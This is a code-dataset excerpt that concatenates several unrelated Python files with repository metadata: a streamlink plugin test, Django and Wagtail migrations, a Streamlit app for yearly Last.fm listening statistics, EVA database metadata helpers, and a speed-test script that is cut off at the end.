:return: average of learned labels over several trials
:rtype: ndarray
"""
constraint_set['constraints'] = ['error']
weak_signals = constraint_set['weak_signals']
assert len(weak_signals.shape) == 3, "Reshape weak signals to num_weak x num_data x num_class"
m, n, k = weak_signals.shape
# initialize y
y = np.random.rand(n, k)
# initialize hyperparameters
rho = 0.1
t = 3 # number of random trials
ys = []
for i in range(t):
ys.append(run_constraints(y, rho, constraint_set))
return np.mean(ys, axis=0)
| 31.504673 | 99 | 0.619104 |
ace09d68ed2ffc904880be6cb311d0b8d1dd492a | 2,022 | py | Python | tests/test_plugins.py | xcgx/streamlink | b635e0d9d0fe9363817a96ec7d31faefed95cb57 | [
"BSD-2-Clause"
] | 10 | 2017-04-10T18:25:41.000Z | 2021-09-15T20:14:58.000Z | tests/test_plugins.py | xcgx/streamlink | b635e0d9d0fe9363817a96ec7d31faefed95cb57 | [
"BSD-2-Clause"
] | 9 | 2020-04-04T09:49:52.000Z | 2020-04-21T01:52:02.000Z | tests/test_plugins.py | xcgx/streamlink | b635e0d9d0fe9363817a96ec7d31faefed95cb57 | [
"BSD-2-Clause"
] | 4 | 2017-03-17T12:28:27.000Z | 2018-01-11T21:14:32.000Z | import os.path
import pkgutil
import unittest
import streamlink.plugins
from streamlink.plugin.plugin import Matcher, Plugin
from streamlink.utils.module import load_module
class PluginTestMeta(type):
def __new__(mcs, name, bases, dict):
plugin_path = os.path.dirname(streamlink.plugins.__file__)
def gentest(plugin):
def load_plugin_test(self):
assert hasattr(plugin, "__plugin__"), "It exports __plugin__"
pluginclass = plugin.__plugin__
assert issubclass(plugin.__plugin__, Plugin), "__plugin__ is an instance of the Plugin class"
classname = pluginclass.__name__
assert classname == classname[0].upper() + classname[1:], "__plugin__ class name starts with uppercase letter"
assert "_" not in classname, "__plugin__ class name does not contain underscores"
assert isinstance(pluginclass.matchers, list) and len(pluginclass.matchers) > 0, "Has at least one matcher"
assert all(isinstance(matcher, Matcher) for matcher in pluginclass.matchers), "Only has valid matchers"
assert not hasattr(pluginclass, "can_handle_url"), "Does not implement deprecated can_handle_url(url)"
assert not hasattr(pluginclass, "priority"), "Does not implement deprecated priority(url)"
assert callable(pluginclass._get_streams), "Implements _get_streams()"
return load_plugin_test
pname: str
for finder, pname, ispkg in pkgutil.iter_modules([plugin_path]):
if pname.startswith("common_"):
continue
plugin_module = load_module(f"streamlink.plugins.{pname}", plugin_path)
dict[f"test_{pname}_load"] = gentest(plugin_module)
return type.__new__(mcs, name, bases, dict)
class TestPlugins(unittest.TestCase, metaclass=PluginTestMeta):
"""
Test that each plugin can be loaded and does not fail when calling can_handle_url.
"""
| 42.125 | 126 | 0.675074 |
ace09da6d1925a8925583e87ca750795a5c49c1d | 470 | py | Python | worknow/core/migrations/0004_auto_20170620_0314.py | projetos-ufpi/Base_DJANGO | e17b8c5427451fb3a6242351beeef1cb5f196cac | [
"Apache-2.0"
] | null | null | null | worknow/core/migrations/0004_auto_20170620_0314.py | projetos-ufpi/Base_DJANGO | e17b8c5427451fb3a6242351beeef1cb5f196cac | [
"Apache-2.0"
] | null | null | null | worknow/core/migrations/0004_auto_20170620_0314.py | projetos-ufpi/Base_DJANGO | e17b8c5427451fb3a6242351beeef1cb5f196cac | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-20 06:14
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0003_auto_20170618_2238'),
]
operations = [
migrations.AlterField(
model_name='userprofile',
name='biografia',
field=models.CharField(default=b'', max_length=250),
),
]
| 22.380952 | 64 | 0.621277 |
ace09dc80516719430c6c8728f8eedfcc0c3caa6 | 1,960 | py | Python | hypha/public/standardpages/migrations/0005_add_more_block.py | maxpearl/hypha | e181ebadfb744aab34617bb766e746368d6f2de0 | [
"BSD-3-Clause"
] | 20 | 2021-04-08T16:38:49.000Z | 2022-02-09T20:05:57.000Z | hypha/public/standardpages/migrations/0005_add_more_block.py | maxpearl/hypha | e181ebadfb744aab34617bb766e746368d6f2de0 | [
"BSD-3-Clause"
] | 1,098 | 2017-12-15T11:23:03.000Z | 2020-01-24T07:58:07.000Z | hypha/public/standardpages/migrations/0005_add_more_block.py | maxpearl/hypha | e181ebadfb744aab34617bb766e746368d6f2de0 | [
"BSD-3-Clause"
] | 17 | 2020-02-07T14:55:54.000Z | 2021-04-04T19:32:38.000Z | # Generated by Django 2.2.19 on 2021-02-28 21:34
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.documents.blocks
import wagtail.embeds.blocks
import wagtail.images.blocks
import wagtail.snippets.blocks
class Migration(migrations.Migration):
dependencies = [
('standardpages', '0004_add_box_apply_link_fields'),
]
operations = [
migrations.AlterField(
model_name='informationpage',
name='body',
field=wagtail.core.fields.StreamField([('heading', wagtail.core.blocks.CharBlock(form_classname='full title', icon='title')), ('paragraph', wagtail.core.blocks.RichTextBlock()), ('box', wagtail.core.blocks.StructBlock([('box_content', wagtail.core.blocks.RichTextBlock()), ('box_class', wagtail.core.blocks.CharBlock(required=False))])), ('more', wagtail.core.blocks.StructBlock([('more_content', wagtail.core.blocks.RichTextBlock()), ('more_content_more', wagtail.core.blocks.RichTextBlock()), ('more_class', wagtail.core.blocks.CharBlock(required=False))])), ('apply_link', wagtail.core.blocks.StructBlock([('application', wagtail.core.blocks.PageChooserBlock())])), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('caption', wagtail.core.blocks.CharBlock(required=False))])), ('quote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.CharBlock(form_classname='title')), ('attribution', wagtail.core.blocks.CharBlock(required=False)), ('job_title', wagtail.core.blocks.CharBlock(required=False))])), ('embed', wagtail.embeds.blocks.EmbedBlock()), ('call_to_action', wagtail.snippets.blocks.SnippetChooserBlock('utils.CallToActionSnippet', template='blocks/call_to_action_block.html')), ('document', wagtail.core.blocks.StructBlock([('document', wagtail.documents.blocks.DocumentChooserBlock()), ('title', wagtail.core.blocks.CharBlock(required=False))]))]),
),
]
| 78.4 | 1,436 | 0.742347 |
ace09ee752c7fa3ad559d0daa58d0e6eb9b73296 | 21,449 | py | Python | YearlyReportSTPublic.py | DonnyDew/MusicYearly | 4533626805c9aac31f9f5d2e9aa9090b3fcf09d8 | [
"MIT"
] | 1 | 2021-06-18T01:54:16.000Z | 2021-06-18T01:54:16.000Z | YearlyReportSTPublic.py | DonnyDew/MusicYearly | 4533626805c9aac31f9f5d2e9aa9090b3fcf09d8 | [
"MIT"
] | null | null | null | YearlyReportSTPublic.py | DonnyDew/MusicYearly | 4533626805c9aac31f9f5d2e9aa9090b3fcf09d8 | [
"MIT"
] | null | null | null | import requests
import time
import streamlit as st
import pandas as pd
import time
from datetime import datetime as dt
import datetime
import os
import pandas as pd
import numpy as np
import plotly.graph_objects as go
# Set up containers
header = st.beta_container()
yearlyData = st.beta_container()
topStuffData = st.beta_container()
JanuaryData = st.beta_container()
FebruaryData = st.beta_container()
MarchData = st.beta_container()
AprilData = st.beta_container()
MayData = st.beta_container()
JuneData = st.beta_container()
JulyData = st.beta_container()
AugustData = st.beta_container()
SeptemberData = st.beta_container()
OctoberData = st.beta_container()
NovemberData = st.beta_container()
DecemberData = st.beta_container()
def monthConvert(monthStr,year):
if monthStr.lower() == 'january' or monthStr.lower() == 'jan':
month = 1
daysInMonth = 31
elif monthStr.lower() == 'february' or monthStr.lower() == 'feb':
month = 2
if (year % 4) == 0:
if (year % 100) == 0:
if (year % 400) == 0:
daysInMonth = 29
else:
daysInMonth = 28
else:
daysInMonth = 29
else:
daysInMonth = 28
elif monthStr.lower() == 'march' or monthStr.lower() == 'mar':
month = 3
daysInMonth = 31
elif monthStr.lower() == 'april' or monthStr.lower() == 'apr':
month = 4
daysInMonth = 30
elif monthStr.lower() == 'may' or monthStr.lower() == 'may':
month = 5
daysInMonth = 31
elif monthStr.lower() == 'june' or monthStr.lower() == 'jun':
month = 6
daysInMonth = 30
elif monthStr.lower() == 'july' or monthStr.lower() == 'jul':
month = 7
daysInMonth = 31
elif monthStr.lower() == 'august' or monthStr.lower() == 'aug':
month = 8
daysInMonth = 31
elif monthStr.lower() == 'september' or monthStr.lower() == 'sep':
month = 9
daysInMonth = 30
elif monthStr.lower() == 'october' or monthStr.lower() == 'oct':
month = 10
daysInMonth = 31
elif monthStr.lower() == 'november' or monthStr.lower() == 'nov':
month = 11
daysInMonth = 30
elif monthStr.lower() == 'december' or monthStr.lower() == 'dec':
month = 12
daysInMonth = 31
else:
month = 0
daysInMonth = 0
return [month,daysInMonth]
def getYearUniTime(yearList):
st.write("Mode 1: Current Year Data")
st.write("Mode 2: Previous Year")
st.write("Mode 3: Custom Time Frame")
mode = int(st.selectbox("Choose mode 1-3",[1,2,3]))
if mode == 1:
today = dt.today()
dateM = str(dt(today.year, today.month, 1))
year = int(dateM[0:4])
timeStart = time.mktime(datetime.datetime(year,1,1,0,0,0).timetuple())
timeEnd = time.time()
if mode == 2:
if len(yearList) == 0:
st.write("No data from previous years... displaying current year")
mode = 1
else:
year = st.selectbox("Enter year",yearList)
timeStart = time.mktime(datetime.datetime(year,1,1,0,0,0).timetuple())
timeEnd = time.mktime(datetime.datetime(year,12,31,23,59,59).timetuple())
if mode == 3:
timeStart = time.mktime(st.date_input("Start Date").timetuple())
timeEnd = time.mktime(st.date_input("End Date").timetuple())
timeStart = format(timeStart, ".0f")
timeEnd = format(timeEnd, ".0f")
floatTime = [timeStart,timeEnd]
return [str(floatTime) for floatTime in floatTime]
def getUserData(pictureOrSTime):
headers = {"user-agent": USER_AGENT}
url = 'http://ws.audioscrobbler.com/2.0/'
payload = {'method':'user.getInfo'}
payload['user'] = USER_AGENT
payload['api_key'] = API_KEY
payload['format'] = 'json'
response = requests.get(url,headers=headers, params=payload)
data = response.json()
if pictureOrSTime == 'picture':
return data['user']['image'][2]['#text']
else:
timestamp = data['user']['registered']['#text']
datetime = str(dt.fromtimestamp(timestamp))
return int(datetime[:4])
def lastfm_weeklyChart(timeList,method):
payload = {'method' : method}
headers = {"user-agent": USER_AGENT}
url = 'http://ws.audioscrobbler.com/2.0/'
payload['user'] = USER_AGENT
payload['api_key'] = API_KEY
payload['format'] = 'json'
payload['from'] = timeList[0]
payload['to'] = timeList[1]
response = requests.get(url,headers=headers, params=payload)
return response.json()
API_KEY = str(os.environ.get('LASTFM_API_KEY')) #Environmental Variable to protect my API key
USER_AGENT = st.text_input("Enter Last Fm User Name")
if USER_AGENT != "":
yearRegistered = getUserData('STime')
countYear = yearRegistered
today = dt.today()
dateM = str(dt(today.year, today.month, 1))
year = int(dateM[0:4])
yearList = []
while year > countYear:
yearList.append(countYear)
countYear += 1
timeList = getYearUniTime(yearList)
st.write("wait for mode option before clicking")
continue_button = st.button("Press when ready")
if continue_button == True:
st.write("Loading . . .")
almost_year = time.ctime(int(timeList[0]))
year = int(almost_year[-4:])
data = lastfm_weeklyChart(timeList,'user.getWeeklyTrackChart')
totalSongs = len(data['weeklytrackchart']['track'])
songDict = {}
for i in range(0,totalSongs):
songDict[i] = {"Track":data['weeklytrackchart']['track'][i]['name'],"PlayCount":int(data['weeklytrackchart']['track'][i]['playcount'])
,"Artist":data['weeklytrackchart']['track'][i]['artist']['#text'],"Image":data['weeklytrackchart']['track'][i]['image'][2]['#text']}
SongList = []
ArtistList = []
SongFreqList = []
for k,v in songDict.items():
SongList.append(songDict[k]["Track"])
ArtistList.append(songDict[k]["Artist"])
SongFreqList.append(songDict[k]["PlayCount"])
data = {'Song Name' : SongList,'Artist':ArtistList,'PlayCount':SongFreqList}
df = pd.DataFrame(data=data)
df.index = np.arange(1,len(df)+1)
#Artist Chart
artistData = lastfm_weeklyChart(timeList,'user.getWeeklyArtistChart')
totalArtists = len(artistData['weeklyartistchart']['artist'])
artArtistList = []
artistFreqList = []
for i in range(0,totalArtists):
artArtistList.append(artistData['weeklyartistchart']['artist'][i]['name'])
artistFreqList.append(artistData['weeklyartistchart']['artist'][i]['playcount'])
arData = {"Aritst Name":artArtistList,"Freq":artistFreqList}
ar = pd.DataFrame(data=arData)
ar.index = np.arange(1,len(ar)+1)
#Album Chart
albumData = lastfm_weeklyChart(timeList,'user.getWeeklyAlbumChart')
totalAlbums = len(albumData['weeklyalbumchart']['album'])
alAlbumList = []
albumFreqList = []
for i in range(0,totalAlbums):
alAlbumList.append(albumData['weeklyalbumchart']['album'][i]['name'])
albumFreqList.append(albumData['weeklyalbumchart']['album'][i]['playcount'])
alData = {"Album Name":alAlbumList,"Freq":albumFreqList}
al = pd.DataFrame(data=alData)
al.index = np.arange(1,len(al)+1)
#-------------------------------------------------------------------------------------
totalTracksPlayed = 0
for k,v in songDict.items():
totalTracksPlayed += songDict[k]['PlayCount']
#--------------------------------------------------------------------------------------
#Picture Data
def lastfm_trackGetInfo(artist,track):
headers = {"user-agent": USER_AGENT}
url = 'http://ws.audioscrobbler.com/2.0/'
payload = {'method' : 'track.getInfo'}
payload['user'] = USER_AGENT
payload['api_key'] = API_KEY
payload['format'] = 'json'
payload["autocorrect"] = 1
payload["artist"] = artist
payload["track"] = track
payload["username"] = USER_AGENT
response = requests.get(url,headers=headers, params=payload)
return response.json()
def getpicUrl(num):
data = lastfm_trackGetInfo(songDict[num]["Artist"],songDict[num]["Track"])
picUrl = data["track"]['album']['image'][3]["#text"]
return picUrl
#User Image
userImage = getUserData('picture')
#Image 1
count = 0
try:
image1 = getpicUrl(0)
except KeyError:
image1 = ""
while len(image1) < 1 :
try:
image1 = getpicUrl(count+1)
count += 1
except KeyError:
count += 1
#Image 2
try:
image2 = getpicUrl(count+1)
if image1 == image2: #Case for when album pic is the same
image2 = ""
count += 1
except KeyError:
image2 = ""
while len(image2) < 1 :
try:
image2 = getpicUrl(count+1)
count += 1
except KeyError:
count += 1
#-----------------------------------------------------------------------------------------------------------
#Genre Feature
def lastfm_artistGetTag(artist):
headers = {"user-agent": USER_AGENT}
url = 'http://ws.audioscrobbler.com/2.0/'
payload = {'method' : 'artist.getTopTags'}
payload['user'] = USER_AGENT
payload['api_key'] = API_KEY
payload['format'] = 'json'
payload["autocorrect"] = 1
payload["artist"] = artist
response = requests.get(url,headers=headers, params=payload)
return response.json()
genreDic = {}
genereCounter = 0
for k,v in songDict.items():
if genereCounter >= 50:
break
aData = lastfm_artistGetTag(songDict[k]["Artist"])
genereCounter += 1
for e in range(0,5):
try:
count = aData['toptags']['tag'][e]['count']
tag = aData['toptags']['tag'][e]['name']
if tag in genreDic:
genreDic[tag] += count
else:
genreDic[tag] = count
except IndexError:
break
def sortDictbyValue2(dictionary):
sorted_keys = sorted(dictionary,reverse = True,key=lambda x: (dictionary[x]))
tempDict = {}
for i in sorted_keys:
tempDict[i] = ""
tempDict2 = {}
for (k,v),(k2,v2) in zip(dictionary.items(),tempDict.items()):
tempDict2[k2] = dictionary[k2]
return tempDict2
genreDic = sortDictbyValue2(genreDic)
genreList = []
genreCountList = []
count = 0
for k,v in genreDic.items():
genreList.append(k)
genreCountList.append(v)
count += 1
if count > 4:
break
genrePie = go.Figure(data=[go.Pie(labels=genreList,values=genreCountList)])
#--------------------------------------------------------------------------------------
with header:
st.title(f"Welcome {USER_AGENT} to your Yearly Song Report")
try:
st.image(userImage)
st.write(f"Profile picture of {USER_AGENT}")
except FileNotFoundError:
st.write("User has no profile picture")
st.subheader("Created by Donny Dew")
st.write("Powered by AudioScrobbler from Last.FM")
st.write("Last.FM URL: https://www.last.fm/")
with yearlyData:
st.header(f"Yearly Statistics for {USER_AGENT} in {year}")
picol1,picol2 = st.beta_columns(2)
picol1.image(image1)
picol2.image(image2)
st.dataframe(df)
tabcol1,tabcol2 = st.beta_columns(2)
tabcol1.dataframe(ar)
tabcol2.dataframe(al)
st.subheader("Genre Pie Chart")
st.write(genrePie)
#--------------------------------------------------------------------------------------
#Each Month Setup
def getMonthUniTime(year,month):
monthDayList = monthConvert(month,year)
timeStart = float(time.mktime(datetime.datetime(year,monthDayList[0],1,0,0,0).timetuple())) + 28800 #For CT + 21600
timeEnd = float(time.mktime(datetime.datetime(year,monthDayList[0],monthDayList[1],23,59,59).timetuple())) + 28800
timeStart = format(timeStart, ".0f")
timeEnd = format(timeEnd, ".0f")
floatTime = [timeStart,timeEnd]
return [str(floatTime) for floatTime in floatTime]
def getMonthlyTables(year,month):
timeList = getMonthUniTime(year,month)
#Tracks
trackData = lastfm_weeklyChart(timeList,'user.getWeeklyTrackChart')
totalSongs = len(trackData['weeklytrackchart']['track'])
songDict = {}
for i in range(0,totalSongs):
songDict[i] = {"Track":trackData['weeklytrackchart']['track'][i]['name'],"PlayCount":int(trackData['weeklytrackchart']['track'][i]['playcount'])
,"Artist":trackData['weeklytrackchart']['track'][i]['artist']['#text']}
totalTracks = 0
for i in range(0,totalSongs):
totalTracks += songDict[i]["PlayCount"]
SongList = []
ArtistList = []
SongFreqList = []
for i in range(0,totalSongs):
SongList.append(songDict[i]["Track"])
ArtistList.append(songDict[i]["Artist"])
SongFreqList.append(songDict[i]["PlayCount"])
tData = {'Song Name' : SongList,'Artist':ArtistList,'PlayCount':SongFreqList}
td = pd.DataFrame(data=tData)
td.index = np.arange(1,len(td)+1)
#Artists
artistData = lastfm_weeklyChart(timeList,'user.getWeeklyArtistChart')
totalArtists = len(artistData['weeklyartistchart']['artist'])
artArtistList = []
artistFreqList = []
for i in range(0,totalArtists):
artArtistList.append(artistData['weeklyartistchart']['artist'][i]['name'])
artistFreqList.append(artistData['weeklyartistchart']['artist'][i]['playcount'])
arData = {"Artist Name":artArtistList,"PlayCount":artistFreqList}
ar = pd.DataFrame(data=arData)
ar.index = np.arange(1,len(ar)+1)
#Albums
albumData = lastfm_weeklyChart(timeList,'user.getWeeklyAlbumChart')
totalAlbums = len(albumData['weeklyalbumchart']['album'])
alAlbumList = []
albumFreqList = []
for i in range(0,totalAlbums):
alAlbumList.append(albumData['weeklyalbumchart']['album'][i]['name'])
albumFreqList.append(albumData['weeklyalbumchart']['album'][i]['playcount'])
alData = {"Album Name":alAlbumList,"Freq":albumFreqList}
al = pd.DataFrame(data=alData)
al.index = np.arange(1,len(al)+1)
#Return 3 tables
return [td,ar,al,tData,arData]
def getTotalSongs(year,month):
timeList = getMonthUniTime(year,month)
#Tracks
trackData = lastfm_weeklyChart(timeList,'user.getWeeklyTrackChart')
totalSongs = len(trackData['weeklytrackchart']['track'])
totalTracks = 0
for i in range(0,totalSongs):
totalTracks += int(trackData['weeklytrackchart']['track'][i]['playcount'])
return totalTracks
theMonths = ["January","February","March","April","May","June","July","August","September","October","November","December"]
monthTables = []
totalSongsList = []
for month in theMonths:
monthTables.append(getMonthlyTables(year,month))
totalSongsList.append(getTotalSongs(year,month))
ts = pd.DataFrame(data=totalSongsList,index=[1,2,3,4,5,6,7,8,9,10,11,12])
janTables = monthTables[0]
febTables = monthTables[1]
marTables = monthTables[2]
aprTables = monthTables[3]
mayTables = monthTables[4]
junTables = monthTables[5]
julTables = monthTables[6]
augTables = monthTables[7]
sepTables = monthTables[8]
octTables = monthTables[9]
novTables = monthTables[10]
decTables = monthTables[11]
#-------------------------------------------------------------------------------------------------
def getTopSong():
Song = []
Artist = []
Plays = []
for i in range(0,12):
try:
Song.append(monthTables[i][3]['Song Name'][0])
Artist.append(monthTables[i][3]['Artist'][0])
Plays.append(monthTables[i][3]['PlayCount'][0])
except IndexError:
Song.append("-")
Artist.append("-")
Plays.append(0)
return [Song,Artist,Plays]
def getTopArtist():
Artist = []
Plays = []
for i in range(0,12):
try:
Artist.append(monthTables[i][4]['Artist Name'][0])
Plays.append(monthTables[i][4]['PlayCount'][0])
except IndexError:
Artist.append("-")
Plays.append(0)
return [Artist,Plays]
TopSongData = getTopSong()
topData = {"Track":TopSongData[0],"Artist":TopSongData[1],"Freq":TopSongData[2]}
tps = pd.DataFrame(data=topData,index=[1,2,3,4,5,6,7,8,9,10,11,12])
tps2 = pd.DataFrame(data=TopSongData[2],index=[1,2,3,4,5,6,7,8,9,10,11,12])
TopArtistData = getTopArtist()
topAData = {"Artist":TopArtistData[0],"Freq":TopArtistData[1]}
ta = pd.DataFrame(data=topAData,index=[1,2,3,4,5,6,7,8,9,10,11,12])
#-------------------------------------------------------------------------------------------------
#Displaying everything
with topStuffData:
st.subheader("Tracks played per month")
st.bar_chart(ts)
st.subheader("Top Songs from each Month")
st.dataframe(tps)
st.subheader("Top Artists from each Month")
st.dataframe(ta)
st.subheader("Top Songs Freq per month")
st.bar_chart(tps2)
with JanuaryData:
st.header("January Data")
st.dataframe(janTables[0])
tabcol1,tabcol2 = st.beta_columns(2)
tabcol1.dataframe(janTables[1])
tabcol2.dataframe(janTables[2])
st.write(f"Total songs played in month: {totalSongsList[0]}")
with FebruaryData:
st.header("February Data")
st.dataframe(febTables[0])
tabcol1,tabcol2 = st.beta_columns(2)
tabcol1.dataframe(febTables[1])
tabcol2.dataframe(febTables[2])
st.write(f"Total songs played in month: {totalSongsList[1]}")
with MarchData:
st.header("March Data")
st.dataframe(marTables[0])
tabcol1,tabcol2 = st.beta_columns(2)
tabcol1.dataframe(marTables[1])
tabcol2.dataframe(marTables[2])
st.write(f"Total songs played in month: {totalSongsList[2]}")
with AprilData:
st.header("April Data")
st.dataframe(aprTables[0])
tabcol1,tabcol2 = st.beta_columns(2)
tabcol1.dataframe(aprTables[1])
tabcol2.dataframe(aprTables[2])
st.write(f"Total songs played in month: {totalSongsList[3]}")
with MayData:
st.header("May Data")
st.dataframe(mayTables[0])
tabcol1,tabcol2 = st.beta_columns(2)
tabcol1.dataframe(mayTables[1])
tabcol2.dataframe(mayTables[2])
st.write(f"Total songs played in month: {totalSongsList[4]}")
with JuneData:
st.header("June Data")
st.dataframe(junTables[0])
tabcol1,tabcol2 = st.beta_columns(2)
tabcol1.dataframe(junTables[1])
tabcol2.dataframe(junTables[2])
st.write(f"Total songs played in month: {totalSongsList[5]}")
with JulyData:
st.header("July Data")
st.dataframe(julTables[0])
tabcol1,tabcol2 = st.beta_columns(2)
tabcol1.dataframe(julTables[1])
tabcol2.dataframe(julTables[2])
st.write(f"Total songs played in month: {totalSongsList[6]}")
with AugustData:
st.header("August Data")
st.dataframe(augTables[0])
tabcol1,tabcol2 = st.beta_columns(2)
tabcol1.dataframe(augTables[1])
tabcol2.dataframe(augTables[2])
st.write(f"Total songs played in month: {totalSongsList[7]}")
with SeptemberData:
st.header("September Data")
st.dataframe(sepTables[0])
tabcol1,tabcol2 = st.beta_columns(2)
tabcol1.dataframe(sepTables[1])
tabcol2.dataframe(sepTables[2])
st.write(f"Total songs played in month: {totalSongsList[8]}")
with OctoberData:
st.header("October Data")
st.dataframe(octTables[0])
tabcol1,tabcol2 = st.beta_columns(2)
tabcol1.dataframe(octTables[1])
tabcol2.dataframe(octTables[2])
st.write(f"Total songs played in month: {totalSongsList[9]}")
with NovemberData:
st.header("November Data")
st.dataframe(novTables[0])
tabcol1,tabcol2 = st.beta_columns(2)
tabcol1.dataframe(novTables[1])
tabcol2.dataframe(novTables[2])
st.write(f"Total songs played in month: {totalSongsList[10]}")
with DecemberData:
st.header("December Data")
st.dataframe(decTables[0])
tabcol1,tabcol2 = st.beta_columns(2)
tabcol1.dataframe(decTables[1])
tabcol2.dataframe(decTables[2])
st.write(f"Total songs played in month: {totalSongsList[11]}")
| 37.828924 | 156 | 0.582032 |
ace09f42906f4bba75541a701b93ae5149d0ec47 | 3,882 | py | Python | ebi_eva_common_pyutils/metadata_utils.py | apriltuesday/eva-common-pyutils | 2f7794395b905981db692db56170a1bf224a96d7 | [
"Apache-2.0"
] | null | null | null | ebi_eva_common_pyutils/metadata_utils.py | apriltuesday/eva-common-pyutils | 2f7794395b905981db692db56170a1bf224a96d7 | [
"Apache-2.0"
] | null | null | null | ebi_eva_common_pyutils/metadata_utils.py | apriltuesday/eva-common-pyutils | 2f7794395b905981db692db56170a1bf224a96d7 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 EMBL - European Bioinformatics Institute
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from urllib.parse import urlsplit
import psycopg2
from ebi_eva_common_pyutils.config_utils import get_metadata_creds_for_profile
from ebi_eva_common_pyutils.pg_utils import get_result_cursor, get_all_results_for_query
def get_metadata_connection_handle(profile, settings_xml_file):
pg_url, pg_user, pg_pass = get_metadata_creds_for_profile(profile, settings_xml_file)
return psycopg2.connect(urlsplit(pg_url).path, user=pg_user, password=pg_pass)
def get_db_conn_for_species(species_db_info):
db_name = "dbsnp_{0}".format(species_db_info["dbsnp_build"])
pg_conn = psycopg2.connect("dbname='{0}' user='{1}' host='{2}' port={3}".
format(db_name, "dbsnp", species_db_info["pg_host"], species_db_info["pg_port"]))
return pg_conn
def get_species_info(metadata_connection_handle, dbsnp_species_name="all"):
get_species_info_query = "select distinct database_name, scientific_name, dbsnp_build, pg_host, pg_port from " \
"dbsnp_ensembl_species.import_progress a " \
"join dbsnp_ensembl_species.dbsnp_build_instance b " \
"on b.dbsnp_build = a.ebi_pg_dbsnp_build "
if dbsnp_species_name != "all":
get_species_info_query += "where database_name = '{0}' ".format(dbsnp_species_name)
get_species_info_query += "order by database_name"
pg_cursor = get_result_cursor(metadata_connection_handle, get_species_info_query)
species_set = [{"database_name": result[0], "scientific_name": result[1], "dbsnp_build":result[2],
"pg_host":result[3], "pg_port":result[4]}
for result in pg_cursor.fetchall()]
pg_cursor.close()
return species_set
# Get connection information for each Postgres instance of the dbSNP mirror
def get_dbsnp_mirror_db_info(pg_metadata_dbname, pg_metadata_user, pg_metadata_host):
with psycopg2.connect("dbname='{0}' user='{1}' host='{2}'".format(pg_metadata_dbname, pg_metadata_user,
pg_metadata_host)) as pg_conn:
dbsnp_mirror_db_info_query = "select * from dbsnp_ensembl_species.dbsnp_build_instance"
dbsnp_mirror_db_info = [{"dbsnp_build": result[0], "pg_host": result[1], "pg_port": result[2]}
for result in get_all_results_for_query(pg_conn, dbsnp_mirror_db_info_query)]
return dbsnp_mirror_db_info
def get_variant_warehouse_db_name_from_assembly_and_taxonomy(metadata_connection_handle, assembly, taxonomy):
query = f"select t.taxonomy_code, a.assembly_code " \
f"from assembly a " \
f"left join taxonomy t on (t.taxonomy_id = a.taxonomy_id) " \
f"where a.assembly_accession = '{assembly}'" \
f"and a.taxonomy_id = {taxonomy}"
rows = get_all_results_for_query(metadata_connection_handle, query)
if len(rows) == 0:
return None
elif len(rows) > 1:
options = ', '.join((f'{r[0]}_{r[1]}' for r in rows))
raise ValueError(f'More than one possible database for assembly {assembly} and taxonomy {taxonomy} found: '
f'{options}')
database_name = f'eva_{rows[0][0]}_{rows[0][1]}'
return database_name
| 51.078947 | 116 | 0.695518 |
ace09f44229c99d57942130892e4f0ccc4bd59aa | 48,786 | py | Python | examples/Nolan/AFRL/Carts/SpeedTest4.py | Rapid-Design-of-Systems-Laboratory/beluga-legacy | d14713d8211b64293c4427005cf02fbd58630598 | [
"MIT"
] | 1 | 2019-03-26T03:00:03.000Z | 2019-03-26T03:00:03.000Z | examples/Nolan/AFRL/Carts/SpeedTest4.py | Rapid-Design-of-Systems-Laboratory/beluga-legacy | d14713d8211b64293c4427005cf02fbd58630598 | [
"MIT"
] | null | null | null | examples/Nolan/AFRL/Carts/SpeedTest4.py | Rapid-Design-of-Systems-Laboratory/beluga-legacy | d14713d8211b64293c4427005cf02fbd58630598 | [
"MIT"
] | 1 | 2019-07-14T22:53:52.000Z | 2019-07-14T22:53:52.000Z | import numpy as np
from beluga.utils.math import *
from beluga.utils.tictoc import *
tf = 1
Dt = 0.1
sigv = 0.1
sigw = 0.1
sigr = 0.1
w = 3.1415/2
xb = 5
yb = 5
u_max = 0.1
v = 30
x_n = 100
y_n = 1e-4
theta_n = 0.1
p11_n = 1e5
p12_n = 1e5
p13_n = 1e5
p22_n = 1e5
p23_n = 1e5
p33_n = 1e5
lamX_N = 50
lamY_N = -100
lamTHETA_N = 2
lamP11_N = 1
lamP12_N = 1
lamP13_N = 1
lamP22_N = 1
lamP23_N = 1
lamP33_N = 1
x_s = 1
y_s = 1
theta_s = 1
p11_s = 1e-3
p12_s = 1e-3
p13_s = 1e-3
p22_s = 1e-1
p23_s = 1e-2
p33_s = 1e-3
ep = 5
tic()
for i in range(1000):
fx = np.array([
